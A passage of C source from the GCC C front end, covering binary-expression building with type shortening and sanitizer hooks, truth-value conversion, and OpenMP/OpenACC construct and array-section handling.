op1 = save_expr (op1);
real = build_unary_op (EXPR_LOCATION (orig_op1), REALPART_EXPR,
op1, true);
imag = build_unary_op (EXPR_LOCATION (orig_op1), IMAGPART_EXPR,
op1, true);
switch (code)
{
case MULT_EXPR:
op0 = save_expr (op0);
imag = build2 (resultcode, real_type, op0, imag);
/* Fall through. */
case PLUS_EXPR:
real = build2 (resultcode, real_type, op0, real);
break;
case MINUS_EXPR:
real = build2 (resultcode, real_type, op0, real);
imag = build1 (NEGATE_EXPR, real_type, imag);
break;
default:
gcc_unreachable();
}
}
ret = build2 (COMPLEX_EXPR, result_type, real, imag);
goto return_build_binary_op;
}
/* For certain operations (which identify themselves by shorten != 0)
if both args were extended from the same smaller type,
do the arithmetic in that type and then extend.
shorten != 0 and != 1 indicates a bitwise operation.
For them, this optimization is safe only if
both args are zero-extended or both are sign-extended.
Otherwise, we might change the result.
Eg, (short)-1 | (unsigned short)-1 is (int)-1
but calculated in (unsigned short) it would be (unsigned short)-1. */
if (shorten && none_complex)
{
final_type = result_type;
result_type = shorten_binary_op (result_type, op0, op1,
shorten == -1);
}
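/* Conversely, (short) a | (short) b may be computed in short:
both operands are sign-extended from short, and sign-extending the
short result reproduces the int result bit for bit. */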
/* Shifts can be shortened if shifting right. */
if (short_shift)
{
int unsigned_arg;
tree arg0 = get_narrower (op0, &unsigned_arg);
final_type = result_type;
if (arg0 == op0 && final_type == TREE_TYPE (op0))
unsigned_arg = TYPE_UNSIGNED (TREE_TYPE (op0));
if (TYPE_PRECISION (TREE_TYPE (arg0)) < TYPE_PRECISION (result_type)
&& tree_int_cst_sgn (op1) > 0
/* We can shorten only if the shift count is less than the
number of bits in the smaller type size. */
&& compare_tree_int (op1, TYPE_PRECISION (TREE_TYPE (arg0))) < 0
/* We cannot drop an unsigned shift after sign-extension. */
&& (!TYPE_UNSIGNED (final_type) || unsigned_arg))
{
/* Do an unsigned shift if the operand was zero-extended. */
result_type
= c_common_signed_or_unsigned_type (unsigned_arg,
TREE_TYPE (arg0));
/* Convert value-to-be-shifted to that type. */
if (TREE_TYPE (op0) != result_type)
op0 = convert (result_type, op0);
converted = 1;
}
}
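/* E.g. ((int) (unsigned short) u) >> 3 can be done as an unsigned
short shift and then widened: the high bits of the int operand are
all zero, so they cannot reach the bits that survive the shift. */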
/* Comparison operations are shortened too but differently.
They identify themselves by setting short_compare = 1. */
if (short_compare)
{
/* Don't write &op0, etc., because that would prevent op0
from being kept in a register.
Instead, make copies of our local variables and
pass the copies by reference, then copy them back afterward. */
tree xop0 = op0, xop1 = op1, xresult_type = result_type;
enum tree_code xresultcode = resultcode;
tree val
= shorten_compare (location, &xop0, &xop1, &xresult_type,
&xresultcode);
if (val != NULL_TREE)
{
ret = val;
goto return_build_binary_op;
}
op0 = xop0, op1 = xop1;
converted = 1;
resultcode = xresultcode;
if (c_inhibit_evaluation_warnings == 0)
{
bool op0_maybe_const = true;
bool op1_maybe_const = true;
tree orig_op0_folded, orig_op1_folded;
if (in_late_binary_op)
{
orig_op0_folded = orig_op0;
orig_op1_folded = orig_op1;
}
else
{
/* Fold for the sake of possible warnings, as in
build_conditional_expr. This requires the
"original" values to be folded, not just op0 and
op1. */
c_inhibit_evaluation_warnings++;
op0 = c_fully_fold (op0, require_constant_value,
&op0_maybe_const);
op1 = c_fully_fold (op1, require_constant_value,
&op1_maybe_const);
c_inhibit_evaluation_warnings--;
orig_op0_folded = c_fully_fold (orig_op0,
require_constant_value,
NULL);
orig_op1_folded = c_fully_fold (orig_op1,
require_constant_value,
NULL);
}
if (warn_sign_compare)
warn_for_sign_compare (location, orig_op0_folded,
orig_op1_folded, op0, op1,
result_type, resultcode);
if (!in_late_binary_op && !int_operands)
{
if (!op0_maybe_const || TREE_CODE (op0) != INTEGER_CST)
op0 = c_wrap_maybe_const (op0, !op0_maybe_const);
if (!op1_maybe_const || TREE_CODE (op1) != INTEGER_CST)
op1 = c_wrap_maybe_const (op1, !op1_maybe_const);
}
}
}
}
/* At this point, RESULT_TYPE must be nonzero to avoid an error message.
If CONVERTED is zero, both args will be converted to type RESULT_TYPE.
Then the expression will be built.
It will be given type FINAL_TYPE if that is nonzero;
otherwise, it will be given type RESULT_TYPE. */
if (!result_type)
{
/* Favor showing any expression locations that are available. */
op_location_t oploc (location, UNKNOWN_LOCATION);
binary_op_rich_location richloc (oploc, orig_op0, orig_op1, true);
binary_op_error (&richloc, code, TREE_TYPE (op0), TREE_TYPE (op1));
return error_mark_node;
}
if (build_type == NULL_TREE)
{
build_type = result_type;
if ((type0 != orig_type0 || type1 != orig_type1)
&& !boolean_op)
{
gcc_assert (may_need_excess_precision && common);
semantic_result_type = c_common_type (orig_type0, orig_type1);
}
}
if (!converted)
{
op0 = ep_convert_and_check (location, result_type, op0,
semantic_result_type);
op1 = ep_convert_and_check (location, result_type, op1,
semantic_result_type);
/* This can happen if one operand has a vector type, and the other
has a different type. */
if (TREE_CODE (op0) == ERROR_MARK || TREE_CODE (op1) == ERROR_MARK)
return error_mark_node;
}
if (sanitize_flags_p ((SANITIZE_SHIFT
| SANITIZE_DIVIDE | SANITIZE_FLOAT_DIVIDE))
&& current_function_decl != NULL_TREE
&& (doing_div_or_mod || doing_shift)
&& !require_constant_value)
{
/* OP0 and/or OP1 might have side-effects. */
op0 = save_expr (op0);
op1 = save_expr (op1);
op0 = c_fully_fold (op0, false, NULL);
op1 = c_fully_fold (op1, false, NULL);
if (doing_div_or_mod && (sanitize_flags_p ((SANITIZE_DIVIDE
| SANITIZE_FLOAT_DIVIDE))))
instrument_expr = ubsan_instrument_division (location, op0, op1);
else if (doing_shift && sanitize_flags_p (SANITIZE_SHIFT))
instrument_expr = ubsan_instrument_shift (location, code, op0, op1);
}
/* Treat expressions in initializers specially as they can't trap. */
if (int_const_or_overflow)
ret = (require_constant_value
? fold_build2_initializer_loc (location, resultcode, build_type,
op0, op1)
: fold_build2_loc (location, resultcode, build_type, op0, op1));
else
ret = build2 (resultcode, build_type, op0, op1);
if (final_type != NULL_TREE)
ret = convert (final_type, ret);
return_build_binary_op:
gcc_assert (ret != error_mark_node);
if (TREE_CODE (ret) == INTEGER_CST && !TREE_OVERFLOW (ret) && !int_const)
ret = (int_operands
? note_integer_operands (ret)
: build1 (NOP_EXPR, TREE_TYPE (ret), ret));
else if (TREE_CODE (ret) != INTEGER_CST && int_operands
&& !in_late_binary_op)
ret = note_integer_operands (ret);
protected_set_expr_location (ret, location);
if (instrument_expr != NULL)
ret = fold_build2 (COMPOUND_EXPR, TREE_TYPE (ret),
instrument_expr, ret);
if (semantic_result_type)
ret = build1_loc (location, EXCESS_PRECISION_EXPR,
semantic_result_type, ret);
return ret;
}
/* Convert EXPR to be a truth-value, validating its type for this
purpose. LOCATION is the source location for the expression. */
tree
c_objc_common_truthvalue_conversion (location_t location, tree expr)
{
bool int_const, int_operands;
switch (TREE_CODE (TREE_TYPE (expr)))
{
case ARRAY_TYPE:
error_at (location, "used array that cannot be converted to pointer where scalar is required");
return error_mark_node;
case RECORD_TYPE:
error_at (location, "used struct type value where scalar is required");
return error_mark_node;
case UNION_TYPE:
error_at (location, "used union type value where scalar is required");
return error_mark_node;
case VOID_TYPE:
error_at (location, "void value not ignored as it ought to be");
return error_mark_node;
case POINTER_TYPE:
if (reject_gcc_builtin (expr))
return error_mark_node;
break;
case FUNCTION_TYPE:
gcc_unreachable ();
case VECTOR_TYPE:
error_at (location, "used vector type where scalar is required");
return error_mark_node;
default:
break;
}
int_const = (TREE_CODE (expr) == INTEGER_CST && !TREE_OVERFLOW (expr));
int_operands = EXPR_INT_CONST_OPERANDS (expr);
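/* An expression with integer constant operands that is not itself
an INTEGER_CST (e.g. one wrapped in a C_MAYBE_CONST_EXPR) is
compared against zero by hand so that the result keeps the
integer-operands marker. */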
if (int_operands && TREE_CODE (expr) != INTEGER_CST)
{
expr = remove_c_maybe_const_expr (expr);
expr = build2 (NE_EXPR, integer_type_node, expr,
convert (TREE_TYPE (expr), integer_zero_node));
expr = note_integer_operands (expr);
}
else
/* ??? Should we also give an error for vectors rather than leaving
those to give errors later? */
expr = c_common_truthvalue_conversion (location, expr);
if (TREE_CODE (expr) == INTEGER_CST && int_operands && !int_const)
{
if (TREE_OVERFLOW (expr))
return expr;
else
return note_integer_operands (expr);
}
if (TREE_CODE (expr) == INTEGER_CST && !int_const)
return build1 (NOP_EXPR, TREE_TYPE (expr), expr);
return expr;
}
/* Convert EXPR to a contained DECL, updating *TC and *SE as
required. */
tree
c_expr_to_decl (tree expr, bool *tc ATTRIBUTE_UNUSED, bool *se)
{
if (TREE_CODE (expr) == COMPOUND_LITERAL_EXPR)
{
tree decl = COMPOUND_LITERAL_EXPR_DECL (expr);
/* Executing a compound literal inside a function reinitializes
it. */
if (!TREE_STATIC (decl))
*se = true;
return decl;
}
else
return expr;
}
/* Generate OMP construct CODE, with compound statement BODY and
clause list CLAUSES. LOC is the location of the construct. */
tree
c_finish_omp_construct (location_t loc, enum tree_code code, tree body,
tree clauses)
{
body = c_end_compound_stmt (loc, body, true);
tree stmt = make_node (code);
TREE_TYPE (stmt) = void_type_node;
OMP_BODY (stmt) = body;
OMP_CLAUSES (stmt) = clauses;
SET_EXPR_LOCATION (stmt, loc);
return add_stmt (stmt);
}
/* Generate OACC_DATA, with compound statement BLOCK and clause list
CLAUSES. LOC is the location of the OACC_DATA. */
tree
c_finish_oacc_data (location_t loc, tree clauses, tree block)
{
tree stmt;
block = c_end_compound_stmt (loc, block, true);
stmt = make_node (OACC_DATA);
TREE_TYPE (stmt) = void_type_node;
OACC_DATA_CLAUSES (stmt) = clauses;
OACC_DATA_BODY (stmt) = block;
SET_EXPR_LOCATION (stmt, loc);
return add_stmt (stmt);
}
/* Generate OACC_HOST_DATA, with compound statement BLOCK and clause
list CLAUSES. LOC is the location of the OACC_HOST_DATA. */
tree
c_finish_oacc_host_data (location_t loc, tree clauses, tree block)
{
tree stmt;
block = c_end_compound_stmt (loc, block, true);
stmt = make_node (OACC_HOST_DATA);
TREE_TYPE (stmt) = void_type_node;
OACC_HOST_DATA_CLAUSES (stmt) = clauses;
OACC_HOST_DATA_BODY (stmt) = block;
SET_EXPR_LOCATION (stmt, loc);
return add_stmt (stmt);
}
/* Like c_begin_compound_stmt, except force the retention of the BLOCK. */
tree
c_begin_omp_parallel (void)
{
tree block;
keep_next_level ();
block = c_begin_compound_stmt (true);
return block;
}
/* Generate OMP_PARALLEL, with compound statement BLOCK and clause
list CLAUSES. LOC is the location of the OMP_PARALLEL. */
tree
c_finish_omp_parallel (location_t loc, tree clauses, tree block)
{
tree stmt;
block = c_end_compound_stmt (loc, block, true);
stmt = make_node (OMP_PARALLEL);
TREE_TYPE (stmt) = void_type_node;
OMP_PARALLEL_CLAUSES (stmt) = clauses;
OMP_PARALLEL_BODY (stmt) = block;
SET_EXPR_LOCATION (stmt, loc);
return add_stmt (stmt);
}
/* Like c_begin_compound_stmt, except force the retention of the BLOCK. */
tree
c_begin_omp_task (void)
{
tree block;
keep_next_level ();
block = c_begin_compound_stmt (true);
return block;
}
/* Generate OMP_TASK, with compound statement BLOCK and clause list
CLAUSES. LOC is the location of the #pragma. */
tree
c_finish_omp_task (location_t loc, tree clauses, tree block)
{
tree stmt;
block = c_end_compound_stmt (loc, block, true);
stmt = make_node (OMP_TASK);
TREE_TYPE (stmt) = void_type_node;
OMP_TASK_CLAUSES (stmt) = clauses;
OMP_TASK_BODY (stmt) = block;
SET_EXPR_LOCATION (stmt, loc);
return add_stmt (stmt);
}
/* Generate GOMP_cancel call for #pragma omp cancel. */
void
c_finish_omp_cancel (location_t loc, tree clauses)
{
tree fn = builtin_decl_explicit (BUILT_IN_GOMP_CANCEL);
int mask = 0;
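/* Encode the construct being cancelled as the bitmask libgomp's
GOMP_cancel expects: 1 parallel, 2 for, 4 sections, 8 taskgroup. */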
if (omp_find_clause (clauses, OMP_CLAUSE_PARALLEL))
mask = 1;
else if (omp_find_clause (clauses, OMP_CLAUSE_FOR))
mask = 2;
else if (omp_find_clause (clauses, OMP_CLAUSE_SECTIONS))
mask = 4;
else if (omp_find_clause (clauses, OMP_CLAUSE_TASKGROUP))
mask = 8;
else
{
error_at (loc, "%<#pragma omp cancel%> must specify one of "
"%<parallel%>, %<for%>, %<sections%> or %<taskgroup%> "
"clauses");
return;
}
tree ifc = omp_find_clause (clauses, OMP_CLAUSE_IF);
if (ifc != NULL_TREE)
{
if (OMP_CLAUSE_IF_MODIFIER (ifc) != ERROR_MARK
&& OMP_CLAUSE_IF_MODIFIER (ifc) != VOID_CST)
error_at (OMP_CLAUSE_LOCATION (ifc),
"expected %<cancel%> %<if%> clause modifier");
else
{
tree ifc2 = omp_find_clause (OMP_CLAUSE_CHAIN (ifc), OMP_CLAUSE_IF);
if (ifc2 != NULL_TREE)
{
gcc_assert (OMP_CLAUSE_IF_MODIFIER (ifc) == VOID_CST
&& OMP_CLAUSE_IF_MODIFIER (ifc2) != ERROR_MARK
&& OMP_CLAUSE_IF_MODIFIER (ifc2) != VOID_CST);
error_at (OMP_CLAUSE_LOCATION (ifc2),
"expected %<cancel%> %<if%> clause modifier");
}
}
tree type = TREE_TYPE (OMP_CLAUSE_IF_EXPR (ifc));
ifc = fold_build2_loc (OMP_CLAUSE_LOCATION (ifc), NE_EXPR,
boolean_type_node, OMP_CLAUSE_IF_EXPR (ifc),
build_zero_cst (type));
}
else
ifc = boolean_true_node;
tree stmt = build_call_expr_loc (loc, fn, 2,
build_int_cst (integer_type_node, mask),
ifc);
add_stmt (stmt);
}
/* Generate GOMP_cancellation_point call for
#pragma omp cancellation point. */
void
c_finish_omp_cancellation_point (location_t loc, tree clauses)
{
tree fn = builtin_decl_explicit (BUILT_IN_GOMP_CANCELLATION_POINT);
int mask = 0;
if (omp_find_clause (clauses, OMP_CLAUSE_PARALLEL))
mask = 1;
else if (omp_find_clause (clauses, OMP_CLAUSE_FOR))
mask = 2;
else if (omp_find_clause (clauses, OMP_CLAUSE_SECTIONS))
mask = 4;
else if (omp_find_clause (clauses, OMP_CLAUSE_TASKGROUP))
mask = 8;
else
{
error_at (loc, "%<#pragma omp cancellation point%> must specify one of "
"%<parallel%>, %<for%>, %<sections%> or %<taskgroup%> "
"clauses");
return;
}
tree stmt = build_call_expr_loc (loc, fn, 1,
build_int_cst (integer_type_node, mask));
add_stmt (stmt);
}
/* Helper function for handle_omp_array_sections. Called recursively
to handle multiple array-section-subscripts. C is the clause,
T the current expression (initially OMP_CLAUSE_DECL), which is either
a TREE_LIST for an array-section-subscript (TREE_PURPOSE is the
low-bound expression if specified, TREE_VALUE the length expression
if specified, TREE_CHAIN what the subscript was specified on), or
some decl.
TYPES vector is populated with array section types, MAYBE_ZERO_LEN
set to true if any of the array-section-subscript could have length
of zero (explicit or implicit), FIRST_NON_ONE is the index of the
first array-section-subscript which is known not to have length
of one. Given say:
map(a[:b][2:1][:c][:2][:d][e:f][2:5])
FIRST_NON_ONE will be 3, array-section-subscript [:b], [2:1] and [:c]
all are or may have length of 1, array-section-subscript [:2] is the
first one known not to have length 1. For array-section-subscript
<= FIRST_NON_ONE we diagnose non-contiguous arrays if low bound isn't
0 or length isn't the array domain max + 1; for > FIRST_NON_ONE we
can do so only if MAYBE_ZERO_LEN is false. MAYBE_ZERO_LEN will be true in the above
case though, as some lengths could be zero. */
static tree
handle_omp_array_sections_1 (tree c, tree t, vec<tree> &types,
bool &maybe_zero_len, unsigned int &first_non_one,
enum c_omp_region_type ort)
{
tree ret, low_bound, length, type;
if (TREE_CODE (t) != TREE_LIST)
{
if (error_operand_p (t))
return error_mark_node;
ret = t;
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND
&& TYPE_ATOMIC (strip_array_types (TREE_TYPE (t))))
{
error_at (OMP_CLAUSE_LOCATION (c), "%<_Atomic%> %qE in %qs clause",
t, omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
if (TREE_CODE (t) == COMPONENT_REF
&& (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_MAP
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TO
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_FROM))
{
if (DECL_BIT_FIELD (TREE_OPERAND (t, 1)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"bit-field %qE in %qs clause",
t, omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
while (TREE_CODE (t) == COMPONENT_REF)
{
if (TREE_CODE (TREE_TYPE (TREE_OPERAND (t, 0))) == UNION_TYPE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is a member of a union", t);
return error_mark_node;
}
t = TREE_OPERAND (t, 0);
if (ort == C_ORT_ACC && TREE_CODE (t) == MEM_REF)
{
if (maybe_ne (mem_ref_offset (t), 0))
error_at (OMP_CLAUSE_LOCATION (c),
"cannot dereference %qE in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
else
t = TREE_OPERAND (t, 0);
}
}
}
if (!VAR_P (t) && TREE_CODE (t) != PARM_DECL)
{
if (DECL_P (t))
error_at (OMP_CLAUSE_LOCATION (c),
"%qD is not a variable in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
else
error_at (OMP_CLAUSE_LOCATION (c),
"%qE is not a variable in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
else if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND
&& TYPE_ATOMIC (TREE_TYPE (t)))
{
error_at (OMP_CLAUSE_LOCATION (c), "%<_Atomic%> %qD in %qs clause",
t, omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
else if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND
&& VAR_P (t)
&& DECL_THREAD_LOCAL_P (t))
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qD is threadprivate variable in %qs clause", t,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_DEPEND
&& TYPE_ATOMIC (TREE_TYPE (t))
&& POINTER_TYPE_P (TREE_TYPE (t)))
{
/* If the array section is pointer based and the pointer
itself is _Atomic qualified, we need to atomically load
the pointer. */
c_expr expr;
memset (&expr, 0, sizeof (expr));
expr.value = ret;
expr = convert_lvalue_to_rvalue (OMP_CLAUSE_LOCATION (c),
expr, false, false);
ret = expr.value;
}
return ret;
}
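/* T is a TREE_LIST: recurse on whatever the subscript was applied
to, then validate this subscript's low bound and length against the
type the recursion returned. */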
ret = handle_omp_array_sections_1 (c, TREE_CHAIN (t), types,
maybe_zero_len, first_non_one, ort);
if (ret == error_mark_node || ret == NULL_TREE)
return ret;
type = TREE_TYPE (ret);
low_bound = TREE_PURPOSE (t);
length = TREE_VALUE (t);
if (low_bound == error_mark_node || length == error_mark_node)
return error_mark_node;
if (low_bound && !INTEGRAL_TYPE_P (TREE_TYPE (low_bound)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"low bound %qE of array section does not have integral type",
low_bound);
return error_mark_node;
}
if (length && !INTEGRAL_TYPE_P (TREE_TYPE (length)))
{
error_at (OMP_CLAUSE_LOCATION (c),
"length %qE of array section does not have integral type",
length);
return error_mark_node;
}
if (low_bound
&& TREE_CODE (low_bound) == INTEGER_CST
&& TYPE_PRECISION (TREE_TYPE (low_bound))
> TYPE_PRECISION (sizetype))
low_bound = fold_convert (sizetype, low_bound);
if (length
&& TREE_CODE (length) == INTEGER_CST
&& TYPE_PRECISION (TREE_TYPE (length))
> TYPE_PRECISION (sizetype))
length = fold_convert (sizetype, length);
if (low_bound == NULL_TREE)
low_bound = integer_zero_node;
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_MAP
&& (OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_ATTACH
|| OMP_CLAUSE_MAP_KIND (c) == GOMP_MAP_DETACH))
{
if (length != integer_one_node)
{
error_at (OMP_CLAUSE_LOCATION (c),
"expected single pointer in %qs clause",
c_omp_map_clause_name (c, ort == C_ORT_ACC));
return error_mark_node;
}
}
if (length != NULL_TREE)
{
if (!integer_nonzerop (length))
{
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_DEPEND
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_IN_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TASK_REDUCTION)
{
if (integer_zerop (length))
{
error_at (OMP_CLAUSE_LOCATION (c),
"zero length array section in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
}
else
maybe_zero_len = true;
}
if (first_non_one == types.length ()
&& (TREE_CODE (length) != INTEGER_CST || integer_onep (length)))
first_non_one++;
}
if (TREE_CODE (type) == ARRAY_TYPE)
{
if (length == NULL_TREE
&& (TYPE_DOMAIN (type) == NULL_TREE
|| TYPE_MAX_VALUE (TYPE_DOMAIN (type)) == NULL_TREE))
{
error_at (OMP_CLAUSE_LOCATION (c),
"for unknown bound array type length expression must "
"be specified");
return error_mark_node;
}
if (TREE_CODE (low_bound) == INTEGER_CST
&& tree_int_cst_sgn (low_bound) == -1)
{
error_at (OMP_CLAUSE_LOCATION (c),
"negative low bound in array section in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
if (length != NULL_TREE
&& TREE_CODE (length) == INTEGER_CST
&& tree_int_cst_sgn (length) == -1)
{
error_at (OMP_CLAUSE_LOCATION (c),
"negative length in array section in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
if (TYPE_DOMAIN (type)
&& TYPE_MAX_VALUE (TYPE_DOMAIN (type))
&& TREE_CODE (TYPE_MAX_VALUE (TYPE_DOMAIN (type)))
== INTEGER_CST)
{
tree size
= fold_convert (sizetype, TYPE_MAX_VALUE (TYPE_DOMAIN (type)));
size = size_binop (PLUS_EXPR, size, size_one_node);
if (TREE_CODE (low_bound) == INTEGER_CST)
{
if (tree_int_cst_lt (size, low_bound))
{
error_at (OMP_CLAUSE_LOCATION (c),
"low bound %qE above array section size "
"in %qs clause", low_bound,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
if (tree_int_cst_equal (size, low_bound))
{
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_DEPEND
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_IN_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_TASK_REDUCTION)
{
error_at (OMP_CLAUSE_LOCATION (c),
"zero length array section in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
maybe_zero_len = true;
}
else if (length == NULL_TREE
&& first_non_one == types.length ()
&& tree_int_cst_equal
(TYPE_MAX_VALUE (TYPE_DOMAIN (type)),
low_bound))
first_non_one++;
}
else if (length == NULL_TREE)
{
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_REDUCTION
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_IN_REDUCTION
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_TASK_REDUCTION)
maybe_zero_len = true;
if (first_non_one == types.length ())
first_non_one++;
}
if (length && TREE_CODE (length) == INTEGER_CST)
{
if (tree_int_cst_lt (size, length))
{
error_at (OMP_CLAUSE_LOCATION (c),
"length %qE above array section size "
"in %qs clause", length,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
if (TREE_CODE (low_bound) == INTEGER_CST)
{
tree lbpluslen
= size_binop (PLUS_EXPR,
fold_convert (sizetype, low_bound),
fold_convert (sizetype, length));
if (TREE_CODE (lbpluslen) == INTEGER_CST
&& tree_int_cst_lt (size, lbpluslen))
{
error_at (OMP_CLAUSE_LOCATION (c),
"high bound %qE above array section size "
"in %qs clause", lbpluslen,
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
}
}
}
else if (length == NULL_TREE)
{
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_REDUCTION
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_IN_REDUCTION
&& OMP_CLAUSE_CODE (c) != OMP_CLAUSE_TASK_REDUCTION)
maybe_zero_len = true;
if (first_non_one == types.length ())
first_non_one++;
}
/* For [lb:] we will need to evaluate lb more than once. */
if (length == NULL_TREE && OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND)
{
tree lb = save_expr (low_bound);
if (lb != low_bound)
{
TREE_PURPOSE (t) = lb;
low_bound = lb;
}
}
}
else if (TREE_CODE (type) == POINTER_TYPE)
{
if (length == NULL_TREE)
{
error_at (OMP_CLAUSE_LOCATION (c),
"for pointer type length expression must be specified");
return error_mark_node;
}
if (length != NULL_TREE
&& TREE_CODE (length) == INTEGER_CST
&& tree_int_cst_sgn (length) == -1)
{
error_at (OMP_CLAUSE_LOCATION (c),
"negative length in array section in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
/* If there is a pointer type anywhere but in the very first
array-section-subscript, the array section can't be contiguous. */
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND
&& TREE_CODE (TREE_CHAIN (t)) == TREE_LIST)
{
error_at (OMP_CLAUSE_LOCATION (c),
"array section is not contiguous in %qs clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return error_mark_node;
}
}
else
{
error_at (OMP_CLAUSE_LOCATION (c),
"%qE does not have pointer or array type", ret);
return error_mark_node;
}
if (OMP_CLAUSE_CODE (c) != OMP_CLAUSE_DEPEND)
types.safe_push (TREE_TYPE (ret));
/* We will need to evaluate lb more than once. */
tree lb = save_expr (low_bound);
if (lb != low_bound)
{
TREE_PURPOSE (t) = lb;
low_bound = lb;
}
ret = build_array_ref (OMP_CLAUSE_LOCATION (c), ret, low_bound);
return ret;
}
/* Handle array sections for clause C. */
static bool
handle_omp_array_sections (tree c, enum c_omp_region_type ort)
{
bool maybe_zero_len = false;
unsigned int first_non_one = 0;
auto_vec<tree, 10> types;
tree *tp = &OMP_CLAUSE_DECL (c);
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_DEPEND
&& TREE_CODE (*tp) == TREE_LIST
&& TREE_PURPOSE (*tp)
&& TREE_CODE (TREE_PURPOSE (*tp)) == TREE_VEC)
tp = &TREE_VALUE (*tp);
tree first = handle_omp_array_sections_1 (c, *tp, types,
maybe_zero_len, first_non_one,
ort);
if (first == error_mark_node)
return true;
if (first == NULL_TREE)
return false;
if (OMP_CLAUSE_CODE (c) == OMP_CLAUSE_DEPEND)
{
tree t = *tp;
tree tem = NULL_TREE;
/* Need to evaluate side effects in the length expressions
if any. */
while (TREE_CODE (t) == TREE_LIST)
{
if (TREE_VALUE (t) && TREE_SIDE_EFFECTS (TREE_VALUE (t)))
{
if (tem == NULL_TREE)
tem = TREE_VALUE (t);
else
tem = build2 (COMPOUND_EXPR, TREE_TYPE (tem),
TREE_VALUE (t), tem);
}
t = TREE_CHAIN (t);
}
if (tem)
first = build2 (COMPOUND_EXPR, TREE_TYPE (first), tem, first);
first = c_fully_fold (first, false, NULL, true);
*tp = first;
}
else
{
unsigned int num = types.length (), i;
tree t, side_effects = NULL_TREE, size = NULL_TREE;
tree condition = NULL_TREE;
if (int_size_in_bytes (TREE_TYPE (first)) <= 0)
maybe_zero_len = true;
for (i = num, t = OMP_CLAUSE_DECL (c); i > 0;
t = TREE_CHAIN (t))
{
tree low_bound = TREE_PURPOSE (t);
tree length = TREE_VALUE (t);
i--;
if (low_bound
&& TREE_CODE (low_bound) == INTEGER_CST
&& TYPE_PRECISION (TREE_TYPE (low_bound))
> TYPE_PRECISION (sizetype))
low_bound = fold_convert (sizetype, low_bound);
if (length
&& TREE_CODE (length) == INTEGER_CST
&& TYPE_PRECISION (TREE_TYPE (length))
> TYPE_PRECISION (sizetype))
length = fold_convert (sizetype, length);
if (low_bound == NULL_TREE)
low_bound = integer_zero_node;
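/* Past the first subscript known not to have length one, the
section stays contiguous only if each subscript spans its whole
dimension: the low bound must be 0 and the length must equal the
domain size. */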
if (!maybe_zero_len && i > first_non_one)
{
if (integer_nonzerop (low_bound))
goto do_warn_noncontiguous;
if (length != NULL_TREE
&& TREE_CODE (length) == INTEGER_CST
&& TYPE_DOMAIN (types[i])
&& TYPE_MAX_VALUE (TYPE_DOMAIN (types[i]))
&& TREE_CODE (TYPE_MAX_VALUE (TYPE_DOMAIN (types[i])))
== INTEGER_CST)
{
tree size;
size = size_binop (PLUS_EXPR,
TYPE_MAX_VALUE (TYPE_DOMAIN (types[i])),
size_one_node);
if (!tree_int_cst_equal (length, size))
{
do_warn_noncontiguous:
error_at (OMP_CLAUSE_LOCATION (c),
"array section is not contiguous in %qs "
"clause",
omp_clause_code_name[OMP_CLAUSE_CODE (c)]);
return true;
}
}
if (length != NULL_TREE
&& TREE_SIDE_EFFECTS (length))
{
if (side_effects == NULL_TREE)
side_effects = length;
else
side_effects = build2 (COMPOUND_EXPR,
TREE_TYPE (side_effects),
length, side_effects);
}
}
else
{
tree l;
if (i > first_non_one
&& ((length && integer_nonzerop (length))
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_REDUCTION
|| OMP_CLAUSE_CODE (c) == OMP_CLAUSE_IN_REDUCTION
